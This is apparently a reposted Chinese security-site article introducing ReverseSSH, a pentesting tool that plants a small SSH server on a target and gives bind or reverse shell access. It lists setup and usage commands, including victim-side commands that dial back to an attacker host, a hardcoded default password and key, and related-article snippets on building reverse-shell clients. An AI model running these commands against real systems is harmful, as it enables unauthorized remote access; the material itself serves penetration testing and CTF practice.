<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ReverseSSH:帶有反向Shell功能的靜態鏈接SSH服務器

    VSole2021-10-10 10:26:43

    關于ReverseSSH

    ReverseSSH是一款功能強大的靜態鏈接SSH服務器,ReverseSSH帶有反向Shell功能,可以幫助廣大研究人員提供強大的遠程訪問功能。該工具主要適用于滲透測試、HackTheBox挑戰或CTF比賽等場景。

    功能介紹

    常見的Shell工具一般都缺少一些方便的功能,比如說完全交互式訪問、Tab鍵補全或歷史記錄等。在ReverseSSH的幫助下,我們可以輕松在目標主機上部署一臺輕量級SSH服務器(<1.5MB),并使用各種強大功能,比如說文件傳輸和端口轉發等等。

    ReverseSSH彌補滲透測試人員在目標設備初始訪問點和本地權限提升操作之間的間隔距離,其主要優勢如下:

    完全交互式Shell訪問;
    通過SFTP實現文件傳輸功能;
    本地/遠程/動態端口轉發;
    可以當作綁定/反向Shell使用;
    支持Unix和Windows操作系統;

    工具要求

    本工具的正常使用要求主機系統安裝并配置好Golang環境。

    系統要求

    Linux:內核版本6.23或更高版本;
    Windows:Windows Server 2008 R2或更高版本、Windows 7或更高版本;

    編譯環境要求

    Golang 1.15;
    upx(apt install upx-ucl);

    工具安裝

    廣大研究人員可以使用下列命令將該項目源碼克隆至本地,并進行項目構建:

    git clone https://github.com/Fahrj/reverse-ssh.git
    

    或者,可以直接訪問該項目的【Releases頁面】下載編譯好的可執行文件。

    工具使用

    當ReverseSSH運行之后,我們就可以使用任意用戶名以及默認密碼“letmeinbrudipls”來與服務器建立連接了。簡而言之,我們可以直接將ReverseSSH當作一臺SSH服務器來使用:

    # 完整交互式Shell訪問ssh -p <RPORT> <RHOST># 簡單的命令執行ssh -p <RPORT> <RHOST> whoami# 完整的文件傳輸sftp -P <RPORT> <RHOST># 端口9050上作為SOCKS代理的動態端口轉發ssh -p <RPORT> -D 9050 <RHOST>
    

    綁定Shell場景

    # 目標主機victim$./reverse-ssh # 攻擊者主機(默認密碼: letmeinbrudipls)attacker$ssh -p 31337 <LHOST>
    

    反向Shell場景

    # 攻擊者主機attacker$./reverse-ssh -l :<LPORT># 目標主機victim$./reverse-ssh -p <LPORT> <LHOST>victim$./reverse-ssh <USER>@<LHOST># 攻擊者主機(默認密碼: letmeinbrudipls)attacker$ssh -p 8888 127.0.0.1attacker$ssh target
    

    工具完整使用

    reverseSSH v1.1.0  Copyright (C) 2021  Ferdinor <ferdinor@mailbox.org>Usage: reverse-ssh [options] [<user>@]<target>Examples:  Bind:        reverse-ssh        reverse-ssh -v -l :4444  Reverse:        reverse-ssh 192.168.0.1        reverse-ssh kali@192.168.0.1        reverse-ssh -p 31337 192.168.0.1        reverse-ssh -v -b 0 kali@192.168.0.2 Options:        -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)                for windows this can only be used to give a path to 'ssh-shellhost.exe' to                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)        -l, Bind scenario only: listen at this address:port (default: :31337)        -p, Reverse scenario only: ssh port at home (default: 22)        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)        -v, Emit log output <target>        Optional target which enables the reverse scenario. Can be prepended with        <user>@ to authenticate as a different user than 'reverse' while dialling home.Credentials:        Accepting all incoming connections from any user with either of the following:         * Password "letmeinbrudipls"         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"
    

    項目地址

    ReverseSSH:【點擊閱讀原文】

    參考資料

    https://github.com/Fahrj/reverse-ssh/blob/master/id_reverse-ssh

    https://github.com/golang/go/wiki/MinimumRequirements#operating-systems

    https://github.com/PowerShell/Win32-OpenSSH/releases/latest?

    shellssh
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    此時,如果你使用的是Linux系統,可以使用mingw-w64-gcc編譯器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 當RSSH服務器啟用了Webserver之后,我們也可以使用下列命令進行編譯:./server --webserver :3232. 這種情況適用于無文件注入的場景。WebhookRSSH服務器可以通過命令行終端接口并使用webhook命令發送原始HTTP請求。
    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell
    一個新發現的規避惡意軟件利用Secure Shell加密協議進入目標系統,目的是挖掘加密貨幣并實施分布式拒絕服務攻擊。
    如果被利用,該漏洞可能允許攻擊者劫持設備的攝像頭和麥克風以監視房主。 安全實驗室 Modux 的研究人員發現了 Enabot 的 Ebo Air 智能機器人的一個缺陷,該機器人旨在娛樂您的整個家庭和寵物。根據 Modux 研究人員的發現,攻擊者可以通過利用該漏洞并監視居住者/用戶來輕松入侵智能機器人。
    安全研究人員觀察到名為 TellYouThePass 的勒索軟件家族嘗試利用最近發現的 Log4j 高危漏洞。TellYouThePass 勒索軟件家族被認為年代比較悠久且基本不活躍,在廣泛使用的 Log4j 日志框架發現漏洞之后,該勒索軟件家族再次活躍。研究人員表示,繼 Khonsari 勒索軟件之后,TellYouThePass 成為第二個被觀察到利用 Log4j 漏洞(被稱為Log4Shel
    網絡交換機充當網絡的構建模塊,促進了局域網(LAN)內的數據流。
    ESXI環境搭建和配置
    2022-05-09 13:32:39
    ESXI環境搭建和配置
    近日,負責提供安全數字化體驗的智能邊緣平臺阿卡邁技術公司(Akamai Technologies)推出了可防范網絡釣魚的全新解決方案Akamai MFA,旨在使企業能夠快速部署FIDO2多因素身份驗證(MFA),而無需部署和管理硬件安全密鑰。Akamai MFA使用智能手機應用程序將現有智能手機轉變為硬件安全密鑰,進而實現流暢的用戶體驗。
    要說哪個網絡威脅組織同時具備狡猾的社會工程學能力和靈活的網絡安全技術,那就不得不提到Muddled Libra了。由于對企業信息技術有著深入的了解,即使你的組織機構擁有完善的傳統網絡防御系統,Muddled Libra也會對你產生巨大的威脅。
    2021 年,全球因勒索軟件造成的損失預計達到 200 億美元,遠高于 2015 年的 3.25 億美元。惡意流量按照攻擊行為可歸納為以下 3 種類型。攻擊行為包括掃描探測、暴力破解等。相比按照惡意流量攻擊行為劃分,學術界更側重于根據惡意流量的內容特征、數據流特征及網絡連接行為特征等具體特征進行劃分。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类